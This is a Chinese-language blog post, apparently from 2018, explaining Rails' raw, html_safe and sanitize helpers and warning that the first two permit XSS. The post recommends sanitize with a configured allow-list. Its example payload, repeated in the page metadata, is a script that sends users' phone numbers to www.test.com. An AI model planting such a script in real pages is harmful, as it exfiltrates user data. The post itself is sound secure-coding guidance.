<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.6.1 -->
<title>rails中的 raw, html_safe, sanitize | blank的个人博客</title>
<meta name="generator" content="Jekyll v4.0.0" />
<meta property="og:title" content="rails中的 raw, html_safe, sanitize" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="避免使用raw和html_safe, 安全使用sanitize raw 例如： &lt;%= raw &quot;&lt;script type=\&quot;text/javascript\&quot;&gt;window.location.href=&#39;http://www.test.com?a=#{User.limit(10).map(&amp;:phone).join(&#39;,&#39;)}&#39;;&lt;/script&gt;&quot; %&gt; 结果： 执行 script中的内容，并且查询User数据发送给www.test.com,如果www.test.com是自己的服务器，我们可以在服务器中截取User用户数据，比如cookie" />
<meta property="og:description" content="避免使用raw和html_safe, 安全使用sanitize raw 例如： &lt;%= raw &quot;&lt;script type=\&quot;text/javascript\&quot;&gt;window.location.href=&#39;http://www.test.com?a=#{User.limit(10).map(&amp;:phone).join(&#39;,&#39;)}&#39;;&lt;/script&gt;&quot; %&gt; 结果： 执行 script中的内容，并且查询User数据发送给www.test.com,如果www.test.com是自己的服务器，我们可以在服务器中截取User用户数据，比如cookie" />
<link rel="canonical" href="http://localhost:4000/2018/09/04/raw-html_safe-sanitize.html" />
<meta property="og:url" content="http://localhost:4000/2018/09/04/raw-html_safe-sanitize.html" />
<meta property="og:site_name" content="blank的个人博客" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2018-09-04T18:10:22+08:00" />
<script type="application/ld+json">
{"url":"http://localhost:4000/2018/09/04/raw-html_safe-sanitize.html","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2018/09/04/raw-html_safe-sanitize.html"},"description":"避免使用raw和html_safe, 安全使用sanitize raw 例如： &lt;%= raw &quot;&lt;script type=\\&quot;text/javascript\\&quot;&gt;window.location.href=&#39;http://www.test.com?a=#{User.limit(10).map(&amp;:phone).join(&#39;,&#39;)}&#39;;&lt;/script&gt;&quot; %&gt; 结果： 执行 script中的内容，并且查询User数据发送给www.test.com,如果www.test.com是自己的服务器，我们可以在服务器中截取User用户数据，比如cookie","headline":"rails中的 raw, html_safe, sanitize","dateModified":"2018-09-04T18:10:22+08:00","datePublished":"2018-09-04T18:10:22+08:00","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/main.css"><link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="blank的个人博客" /></head>
<body><header class="site-header" role="banner">

  <div class="wrapper"><a class="site-title" rel="author" href="/">blank的个人博客</a><nav class="site-nav">
        <input type="checkbox" id="nav-trigger" class="nav-trigger" />
        <label for="nav-trigger">
          <span class="menu-icon">
            <svg viewBox="0 0 18 15" width="18px" height="15px">
              <path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z"/>
            </svg>
          </span>
        </label>

        <div class="trigger"><a class="page-link" href="/about/">关于我</a></div>
      </nav></div>
</header>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title p-name" itemprop="name headline">rails中的 raw, html_safe, sanitize</h1>
    <p class="post-meta">
      <time class="dt-published" datetime="2018-09-04T18:10:22+08:00" itemprop="datePublished">Sep 4, 2018
      </time></p>
  </header>

  <div class="post-content e-content" itemprop="articleBody">
    <p>避免使用<code class="highlighter-rouge">raw</code>和<code class="highlighter-rouge">html_safe</code>, 安全使用<code class="highlighter-rouge">sanitize</code></p>
<ul>
  <li>
    <h3 id="raw">raw</h3>
    <p>例如：</p>
  </li>
</ul>

<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="o">&lt;</span><span class="sx">%= raw "&lt;script type=</span><span class="p">\</span><span class="s2">"text/javascript</span><span class="se">\"</span><span class="s2">&gt;window.location.href='http://www.test.com?a=</span><span class="si">#{</span><span class="no">User</span><span class="p">.</span><span class="nf">limit</span><span class="p">(</span><span class="mi">10</span><span class="p">).</span><span class="nf">map</span><span class="p">(</span><span class="o">&amp;</span><span class="ss">:phone</span><span class="p">).</span><span class="nf">join</span><span class="p">(</span><span class="s1">','</span><span class="p">)</span><span class="si">}</span><span class="s2">';&lt;/script&gt;"</span> <span class="o">%&gt;</span></code></pre></figure>

<p>结果：
执行 <code class="highlighter-rouge">script</code>中的内容，并且查询<code class="highlighter-rouge">User</code>数据发送给<code class="highlighter-rouge">www.test.com</code>,如果<code class="highlighter-rouge">www.test.com</code>是自己的服务器，我们可以在服务器中截取<code class="highlighter-rouge">User</code>用户数据，比如<code class="highlighter-rouge">cookie</code></p>

<p>我们可以看<code class="highlighter-rouge">raw</code>的源代码，其实就是用<code class="highlighter-rouge">html_safe</code>实现的</p>

<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="k">def</span> <span class="nf">raw</span><span class="p">(</span><span class="n">stringish</span><span class="p">)</span>
  <span class="n">stringish</span><span class="p">.</span><span class="nf">to_s</span><span class="p">.</span><span class="nf">html_safe</span>
<span class="k">end</span></code></pre></figure>

<ul>
  <li>
    <h3 id="html_safe">html_safe</h3>
  </li>
</ul>

<p><code class="highlighter-rouge">html_safe</code>是完全把你的<code class="highlighter-rouge">html</code>内容原本原样的输出，这种事非常不安全的，把<code class="highlighter-rouge">script</code>标签的内容输出并执行结果，比如会造成XSS攻击
和<code class="highlighter-rouge">raw</code>一样，同上</p>

<ul>
  <li>
    <h3 id="sanitize">sanitize</h3>
  </li>
</ul>

<p><code class="highlighter-rouge">sanitize</code>的源代码中：</p>

<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="nb">self</span><span class="p">.</span><span class="nf">allowed_tags</span> <span class="o">=</span> <span class="no">Set</span><span class="p">.</span><span class="nf">new</span><span class="p">(</span><span class="sx">%w(strong em b i p code pre tt samp kbd var sub
  sup dfn cite big small address hr br div span h1 h2 h3 h4 h5 h6 ul ol li dl dt dd abbr
  acronym a img blockquote del ins)</span><span class="p">)</span>
<span class="nb">self</span><span class="p">.</span><span class="nf">allowed_attributes</span> <span class="o">=</span> <span class="no">Set</span><span class="p">.</span><span class="nf">new</span><span class="p">(</span><span class="sx">%w(href src width height alt cite datetime title class name xml:lang abbr)</span><span class="p">)</span></code></pre></figure>

<p>我们可以看到，<code class="highlighter-rouge">sanitize</code>是有默认的白名单，把一些危险的标签给去除掉，相对<code class="highlighter-rouge">html_safe</code>安全很多
也可以自己设置白名单
在<code class="highlighter-rouge">config/appliction.rb</code>中设置：</p>

<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="k">class</span> <span class="nc">Application</span> <span class="o">&lt;</span> <span class="no">Rails</span><span class="o">::</span><span class="no">Application</span>
 <span class="n">config</span><span class="p">.</span><span class="nf">action_view</span><span class="p">.</span><span class="nf">sanitized_allowed_tags</span> <span class="o">=</span> <span class="p">[</span><span class="s1">'table'</span><span class="p">,</span> <span class="s1">'tr'</span><span class="p">,</span> <span class="s1">'td'</span><span class="p">]</span> <span class="c1">#安全的标签</span>
 <span class="n">config</span><span class="p">.</span><span class="nf">action_view</span><span class="p">.</span><span class="nf">sanitized_allowed_attributes</span> <span class="o">=</span> <span class="p">[</span><span class="s1">'id'</span><span class="p">,</span> <span class="s1">'class'</span><span class="p">,</span> <span class="s1">'style'</span><span class="p">]</span> <span class="c1">#安全的属性</span>
<span class="k">end</span></code></pre></figure>

<p>例如：</p>

<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="o">&lt;</span><span class="sx">%= sanitize "&lt;script type=</span><span class="p">\</span><span class="s2">"text/javascript</span><span class="se">\"</span><span class="s2">&gt;window.location.href='http://www.test.com?a=</span><span class="si">#{</span><span class="no">User</span><span class="p">.</span><span class="nf">limit</span><span class="p">(</span><span class="mi">10</span><span class="p">).</span><span class="nf">map</span><span class="p">(</span><span class="o">&amp;</span><span class="ss">:phone</span><span class="p">).</span><span class="nf">join</span><span class="p">(</span><span class="s1">','</span><span class="p">)</span><span class="si">}</span><span class="s2">';&lt;/script&gt;"</span> <span class="o">%&gt;</span></code></pre></figure>

<p>结果：</p>

<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">window</span><span class="p">.</span><span class="nf">location</span><span class="p">.</span><span class="nf">href</span><span class="o">=</span><span class="s1">'http://www.test.com?a=***'</span><span class="p">;</span></code></pre></figure>

<p>并不会执行<code class="highlighter-rouge">script</code>,而是把不是白名单的标签内容输出</p>

<p>不管怎么样，使用<code class="highlighter-rouge">sanitize</code>就好了，如果有需求也可以自行配置<code class="highlighter-rouge">sanitize</code>的白名单，比较安全可靠</p>

  </div><a class="u-url" href="/2018/09/04/raw-html_safe-sanitize.html" hidden></a>
</article>

      </div>
    </main><footer class="site-footer h-card">
  <data class="u-url" href="/"></data>

  <div class="wrapper">

    <h2 class="footer-heading">blank的个人博客</h2>

    <div class="footer-col-wrapper">
      <div class="footer-col footer-col-1">
        <ul class="contact-list">
          <li class="p-name">blank的个人博客</li><li><a class="u-email" href="mailto:jingfa.nie@gmail.com">jingfa.nie@gmail.com</a></li></ul>
      </div>

      <div class="footer-col footer-col-2"><ul class="social-media-list"><li><a href="https://github.com/niejingfa"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#github"></use></svg> <span class="username">niejingfa</span></a></li></ul>
</div>

      <div class="footer-col footer-col-3">
        <p>个人的一个免费分享网站，可以转载，注明出处!! ←联系我github, gmail</p>
      </div>
    </div>

  </div>

</footer>
</body>

</html>
